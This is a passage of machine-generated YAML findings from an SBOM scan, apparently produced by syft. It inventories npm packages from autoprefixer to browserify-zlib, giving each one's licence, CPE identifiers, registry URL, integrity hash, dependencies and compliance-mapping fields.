*id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: b5ad0267f42a44eb ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: autoprefixer 10.5.0' title: autoprefixer 10.5.0 description: 'Package discovered: autoprefixer 10.5.0' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 9d0845c4768cfcf5 name: autoprefixer version: 10.5.0 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:autoprefixer:autoprefixer:10.5.0:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/autoprefixer@10.5.0 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/autoprefixer/-/autoprefixer-10.5.0.tgz integrity: sha512-FMhOoZV4+qR6aTUALKX2rEqGG+oyATvwBt9IIzVR5rMa2HRWPkxf+P+PAJLD1I/H5/II+HuZcBJYEFBpq39ong== dependencies: browserslist: ^4.28.2 caniuse-lite: ^1.0.30001787 fraction.js: ^5.3.4 picocolors: ^1.1.1 postcss-value-parser: ^4.2.0 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: fba99cf19e7cc071 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: axios 1.15.2' title: axios 1.15.2 description: 'Package discovered: axios 1.15.2' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 691f5259c0d155d0 name: axios version: 1.15.2 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:axios:axios:1.15.2:*:*:*:*:node.js:*:* source: nvd-cpe-dictionary purl: pkg:npm/axios@1.15.2 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/axios/-/axios-1.15.2.tgz integrity: sha512-wLrXxPtcrPTsNlJmKjkPnNPK2Ihe0hn0wGSaTEiHRPxwjvJwT3hKmXF4dpqxmPO9SoNb2FsYXj/xEo0gHN+D5A== dependencies: follow-redirects: ^1.15.11 form-data: ^4.0.5 proxy-from-env: ^2.1.0 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 15b2afab0d6c8b1b ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: balanced-match 1.0.2' title: balanced-match 1.0.2 description: 'Package discovered: balanced-match 1.0.2' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 0d7c80c1e227b7e2 name: balanced-match version: 1.0.2 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:balanced-match:balanced-match:1.0.2:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:balanced-match:balanced_match:1.0.2:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:balanced_match:balanced-match:1.0.2:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:balanced_match:balanced_match:1.0.2:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:balanced:balanced-match:1.0.2:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:balanced:balanced_match:1.0.2:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/balanced-match@1.0.2 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/balanced-match/-/balanced-match-1.0.2.tgz integrity: sha512-3oSeUO0TMV67hN1AmbXsK4yaqU7tjiHlbxRDZOpH0KW9+CeX4bRAaX0Anxt0tx2MrpRpWwQaPwIlISEJhYU5Pw== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: e3263834d404d719 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: base64-js 0.0.8' title: base64-js 0.0.8 description: 'Package discovered: base64-js 0.0.8' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: b2d621b6dd16cf05 name: base64-js version: 0.0.8 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:base64-js:base64-js:0.0.8:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:base64-js:base64_js:0.0.8:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:base64_js:base64-js:0.0.8:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:base64_js:base64_js:0.0.8:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:base64:base64-js:0.0.8:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:base64:base64_js:0.0.8:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/base64-js@0.0.8 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/base64-js/-/base64-js-0.0.8.tgz integrity: sha512-3XSA2cR/h/73EzlXXdU6YNycmYI7+kicTxks4eJg2g39biHR84slg2+des+p7iHYhbRg/udIS4TD53WabcOUkw== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 277066fc01f56c50 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: base64-js 1.5.1' title: base64-js 1.5.1 description: 'Package discovered: base64-js 1.5.1' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: c7ab39b9720e240f name: base64-js version: 1.5.1 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:base64-js:base64-js:1.5.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:base64-js:base64_js:1.5.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:base64_js:base64-js:1.5.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:base64_js:base64_js:1.5.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:base64:base64-js:1.5.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:base64:base64_js:1.5.1:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/base64-js@1.5.1 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/base64-js/-/base64-js-1.5.1.tgz integrity: sha512-AKpaYlHn8t4SVbOHCy+b5+KKgvR4vrsD8vbvrbiQJps7fKDTkjkDry6ji0rUJjC0kzbNePLwzxq8iypo41qeWA== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: d8b667ce3a0cff7b ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: base64id 2.0.0' title: base64id 2.0.0 description: 'Package discovered: base64id 2.0.0' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 224462b6727019f7 name: base64id version: 2.0.0 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:base64id:base64id:2.0.0:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/base64id@2.0.0 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/base64id/-/base64id-2.0.0.tgz integrity: sha512-lGe34o6EHj9y3Kts9R4ZYs/Gr+6N7MCaMlIFA3F1R2O5/m7K06AxfSeO5530PEERE6/WyEg3lsuyw4GHlPZHog== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: b03c61c0d46ca441 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: baseline-browser-mapping 2.10.24' title: baseline-browser-mapping 2.10.24 description: 'Package discovered: baseline-browser-mapping 2.10.24' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 013c8659dba6bad8 name: baseline-browser-mapping version: 2.10.24 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: Apache-2.0 spdxExpression: Apache-2.0 type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:baseline-browser-mapping:baseline-browser-mapping:2.10.24:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:baseline-browser-mapping:baseline_browser_mapping:2.10.24:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:baseline_browser_mapping:baseline-browser-mapping:2.10.24:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:baseline_browser_mapping:baseline_browser_mapping:2.10.24:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:baseline-browser:baseline-browser-mapping:2.10.24:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:baseline-browser:baseline_browser_mapping:2.10.24:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:baseline_browser:baseline-browser-mapping:2.10.24:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:baseline_browser:baseline_browser_mapping:2.10.24:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:baseline:baseline-browser-mapping:2.10.24:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:baseline:baseline_browser_mapping:2.10.24:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/baseline-browser-mapping@2.10.24 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/baseline-browser-mapping/-/baseline-browser-mapping-2.10.24.tgz integrity: sha512-I2NkZOOrj2XuguvWCK6OVh9GavsNjZjK908Rq3mIBK25+GD8vPX5w2WdxVqnQ7xx3SrZJiCiZFu+/Oz50oSYSA== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 83b4bdfed9e1341d ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: basic-auth 2.0.1' title: basic-auth 2.0.1 description: 'Package discovered: basic-auth 2.0.1' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 3e5df9b4f6b62db4 name: basic-auth version: 2.0.1 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:basic-auth:basic-auth:2.0.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:basic-auth:basic_auth:2.0.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:basic_auth:basic-auth:2.0.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:basic_auth:basic_auth:2.0.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:basic:basic-auth:2.0.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:basic:basic_auth:2.0.1:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/basic-auth@2.0.1 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/basic-auth/-/basic-auth-2.0.1.tgz integrity: sha512-NF+epuEdnUYVlGuhaxbbq+dvJttwLnGY+YixlXlME5KpQ5W3CnXA5cVTneY3SPbPDRkcjMbifrwmFYcClgOZeg== dependencies: safe-buffer: 5.1.2 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 673442d13a9240b9 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: bcryptjs 2.4.3' title: bcryptjs 2.4.3 description: 'Package discovered: bcryptjs 2.4.3' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 06243f2e41cd3912 name: bcryptjs version: 2.4.3 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:bcryptjs:bcryptjs:2.4.3:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/bcryptjs@2.4.3 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/bcryptjs/-/bcryptjs-2.4.3.tgz integrity: sha512-V/Hy/X9Vt7f3BbPJEi8BdVFMByHi+jNXrYkW3huaybV/kQ0KJg0Y6PkEMbn+zeT+i+SiKZ/HMqJGIIt4LZDqNQ== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: b36a32eeee7b64f7 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: bidi-js 1.0.3' title: bidi-js 1.0.3 description: 'Package discovered: bidi-js 1.0.3' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 983a70fcd42b01da name: bidi-js version: 1.0.3 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:bidi-js:bidi-js:1.0.3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:bidi-js:bidi_js:1.0.3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:bidi_js:bidi-js:1.0.3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:bidi_js:bidi_js:1.0.3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:bidi:bidi-js:1.0.3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:bidi:bidi_js:1.0.3:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/bidi-js@1.0.3 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/bidi-js/-/bidi-js-1.0.3.tgz integrity: sha512-RKshQI1R3YQ+n9YJz2QQ147P66ELpa1FQEg20Dk8oW9t2KgLbpDLLp9aGZ7y8WHSshDknG0bknqGw5/tyCs5tw== dependencies: require-from-string: ^2.0.2 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 2fa656db5288bebd ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: bignumber.js 9.3.1' title: bignumber.js 9.3.1 description: 'Package discovered: bignumber.js 9.3.1' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 0debd0f90c403668 name: bignumber.js version: 9.3.1 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:bignumber.js:bignumber.js:9.3.1:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/bignumber.js@9.3.1 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/bignumber.js/-/bignumber.js-9.3.1.tgz integrity: sha512-Ko0uX15oIUS7wJ3Rb30Fs6SkVbLmPBAKdlm7q9+ak9bbIeFf0MwuBsQV6z7+X768/cHsfg+WlysDWJcmthjsjQ== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 7dd5ae9dd664c020 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: binary-extensions 2.3.0' title: binary-extensions 2.3.0 description: 'Package discovered: binary-extensions 2.3.0' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: a472eb11fead94f4 name: binary-extensions version: 2.3.0 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:binary-extensions:binary-extensions:2.3.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:binary-extensions:binary_extensions:2.3.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:binary_extensions:binary-extensions:2.3.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:binary_extensions:binary_extensions:2.3.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:binary:binary-extensions:2.3.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:binary:binary_extensions:2.3.0:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/binary-extensions@2.3.0 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/binary-extensions/-/binary-extensions-2.3.0.tgz integrity: sha512-Ceh+7ox5qe7LJuLHoY0feh3pHuUDHAcRUeyL2VYghZwfpkNIy/+8Ocg0a3UuSoYzavmylwuLWQOf3hl0jjMMIw== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: d29a5e4fb92420c3 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: body-parser 1.20.5' title: body-parser 1.20.5 description: 'Package discovered: body-parser 1.20.5' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 04b33f5cfaf593a5 name: body-parser version: 1.20.5 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:openjsf:body-parser:1.20.5:*:*:*:*:node.js:*:* source: nvd-cpe-dictionary purl: pkg:npm/body-parser@1.20.5 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/body-parser/-/body-parser-1.20.5.tgz integrity: sha512-3grm+/2tUOvu2cjJkvsIxrv/wVpfXQW4PsQHYm7yk4vfpu7Ekl6nEsYBoJUL6qDwZUx8wUhQ8tR2qz+ad9c9OA== dependencies: bytes: ~3.1.2 content-type: ~1.0.5 debug: 2.6.9 depd: 2.0.0 destroy: ~1.2.0 http-errors: ~2.0.1 iconv-lite: ~0.4.24 on-finished: ~2.4.1 qs: ~6.15.1 raw-body: ~2.5.3 type-is: ~1.6.18 unpipe: ~1.0.0 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 8d245dad35d0de48 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: brace-expansion 2.1.0' title: brace-expansion 2.1.0 description: 'Package discovered: brace-expansion 2.1.0' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 833f3564230327b0 name: brace-expansion version: 2.1.0 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:brace-expansion:brace-expansion:2.1.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:brace-expansion:brace_expansion:2.1.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:brace_expansion:brace-expansion:2.1.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:brace_expansion:brace_expansion:2.1.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:brace:brace-expansion:2.1.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:brace:brace_expansion:2.1.0:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/brace-expansion@2.1.0 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/brace-expansion/-/brace-expansion-2.1.0.tgz integrity: sha512-TN1kCZAgdgweJhWWpgKYrQaMNHcDULHkWwQIspdtjV4Y5aurRdZpjAqn6yX3FPqTA9ngHCc4hJxMAMgGfve85w== dependencies: balanced-match: ^1.0.0 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 2c758a1366af3ce7 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: braces 3.0.3' title: braces 3.0.3 description: 'Package discovered: braces 3.0.3' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: e8863a3d87ad712b name: braces version: 3.0.3 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:braces_project:braces:3.0.3:*:*:*:*:node.js:*:* source: nvd-cpe-dictionary - cpe: cpe:2.3:a:jonschlinkert:braces:3.0.3:*:*:*:*:node.js:*:* source: nvd-cpe-dictionary purl: pkg:npm/braces@3.0.3 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/braces/-/braces-3.0.3.tgz integrity: sha512-yQbXgO/OSZVD2IsiLlro+7Hf6Q18EJrKSEsdoMzKePKXct3gvD8oLcOQdIzGupr5Fj+EDe8gO/lxc1BzfMpxvA== dependencies: fill-range: ^7.1.1 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 4acea70fbe4d3073 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: brotli 1.3.3' title: brotli 1.3.3 description: 'Package discovered: brotli 1.3.3' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 6bc686959e36e164 name: brotli version: 1.3.3 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:brotli:brotli:1.3.3:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/brotli@1.3.3 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/brotli/-/brotli-1.3.3.tgz integrity: sha512-oTKjJdShmDuGW94SyyaoQvAjf30dZaHnjJ8uAF+u2/vGJkJbJPJAT1gDiOJP5v1Zb6f9KEyW/1HpuaWIXtGHPg== dependencies: base64-js: ^1.1.2 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 08e716a2d2fe7179 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: browserify-zlib 0.2.0' title: browserify-zlib 0.2.0 description: 'Package discovered: browserify-zlib 0.2.0' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: adb6ab9adab6e7b8 name: browserify-zlib version: 0.2.0 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:browserify-zlib:browserify-zlib:0.2.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:browserify-zlib:browserify_zlib:0.2.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:browserify_zlib:browserify-zlib:0.2.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:browserify_zlib:browserify_zlib:0.2.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:browserify:browserify-zlib:0.2.0:*:*:*:*:*:*:* source: syft-generated - cpe: 